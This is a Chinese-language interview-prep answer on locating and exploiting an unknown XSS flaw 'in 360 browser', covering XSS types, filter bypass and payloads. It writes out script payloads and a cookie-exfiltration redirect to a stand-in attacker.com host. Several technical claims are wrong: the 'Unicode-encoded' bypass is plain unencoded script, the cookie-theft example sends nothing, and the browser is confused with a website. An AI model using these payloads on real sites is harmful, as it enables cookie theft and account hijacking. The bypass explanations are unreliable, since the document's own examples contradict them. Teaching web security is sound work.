在360浏览器中,你如何定位并利用一个未知的XSS漏洞?请详细描述从发现到验证利用的完整流程,包括使用的工具、技术手段以及可能遇到的挑战。
答案
1) 【一句话结论】定位并利用未知XSS漏洞需通过输入点分析、过滤逻辑深度分析、工具辅助抓包,核心是绕过过滤使恶意脚本执行,最终实现漏洞利用(如窃取Cookie、重定向等)。
2) 【原理/概念讲解】XSS(跨站脚本)是恶意脚本注入,导致用户浏览器执行。分为三类:
- 反射型:输入后立即返回(如搜索结果URL);
- 存储型:输入存储到数据库(如评论、用户名);
- DOM型:DOM操作触发(如点击按钮后修改DOM)。
关键步骤:识别输入点(URL参数、表单、API)、检查过滤(正则、白名单、编码)、构造payload(绕过过滤,如编码、绕过白名单)、验证执行(看弹窗、控制台输出)。类比:就像给网页的输入框“注入”脚本,脚本在用户浏览器里运行,就像用户自己执行了恶意代码,可窃取Cookie、重定向等。
3) 【对比与适用场景】
| 类型 | 定义 | 过滤逻辑常见方式 | 典型绕过技术 | 利用场景 |
|---|---|---|---|---|
| 反射型 | 输入后立即返回,无存储 | 正则匹配(如过滤<script)、简单编码过滤 | URL编码、Unicode编码绕过正则 | 搜索、推荐链接 |
| 存储型 | 输入存储数据库,后续访问 | 白名单(允许特定字符)、数据库注入过滤 | 编码绕过白名单、利用白名单不完整 | 评论、用户名 |
| DOM型 | DOM操作触发,无服务器存储 | 事件绑定过滤(如过滤on事件)、DOM属性过滤 | 事件触发payload(如点击按钮后插入脚本)、DOM属性绕过 | 点击按钮、动态内容 |
4) 【示例】假设360浏览器搜索框URL参数q,服务器端过滤正则匹配<script(如/<script/),构造Unicode编码绕过payload:http://360.com/search?q=<script>alert(1)&</script>。测试时,输入该URL,页面显示搜索结果并弹出alert(1),说明存在反射型XSS。若需窃取Cookie,构造http://360.com/search?q=<script>document.cookie</script>,验证是否获取Cookie。
5) 【面试口播版答案】面试官您好,定位并利用未知XSS漏洞的流程,我会分步骤讲:首先分析页面所有输入点,比如URL参数、表单输入框、API接口,用浏览器开发者工具(Chrome DevTools)检查这些输入点如何被服务器处理,比如是否经过过滤或编码。然后,构造基础payload,比如<script>alert(1)</script>,分别测试不同输入位置(URL、表单、API),看是否触发弹窗。如果某个位置能弹出alert,说明存在反射型XSS;如果需要用户点击按钮后执行,可能涉及DOM型。接下来,分析过滤逻辑,比如检查响应头或源码中的过滤函数,判断是否为正则匹配(如过滤<script),尝试编码绕过,比如用Unicode编码构造<script>alert(1)&</script>,测试是否仍能执行。验证后,构造更复杂的payload,比如窃取Cookie(document.cookie)或重定向(window.location.href='http://attacker.com?c=' + document.cookie),确认漏洞利用。过程中,用抓包工具(如Fiddler)分析请求响应,确保payload正确传递,多次测试不同用户环境(如不同浏览器、操作系统)验证漏洞的稳定性。
6) 【追问清单】
- 问:如何判断输入是否被过滤?比如看到“请输入正确内容”提示,如何绕过?
回答要点:检查过滤逻辑,比如正则匹配,尝试绕过正则(如用特殊字符、编码),或利用白名单漏洞(如白名单不完整,允许某些字符)。 - 问:如果发现是DOM型XSS,如何利用?比如点击按钮后执行?
回答要点:分析DOM操作,构造事件触发payload,比如点击按钮后修改DOM,插入脚本(如onclick='javascript:alert(1)')。 - 问:如何处理跨域问题?比如360浏览器有同源策略,如何绕过?
回答要点:检查是否为同源,若跨域,可能需要利用DOM型或存储型,或者通过其他方式(如iframe、postMessage)绕过,但通常同源策略下DOM型更常见。 - 问:如何验证漏洞的持久性?比如存储型是否存储后能被其他用户访问?
回答要点:测试存储型,提交payload到数据库,然后让其他用户访问,看是否执行。
7) 【常见坑/雷区】
- 忽略过滤逻辑,直接构造payload,导致被过滤,误判无漏洞;
- 错误判断漏洞类型,比如把DOM型当成反射型,导致利用失败;
- 忽略编码,比如没有对特殊字符编码,导致payload被破坏;
- 忽略同源策略,认为所有位置都能执行,实际受限制;
- 漏洞描述不完整,比如只说有XSS,没说明具体影响(如窃取Cookie)。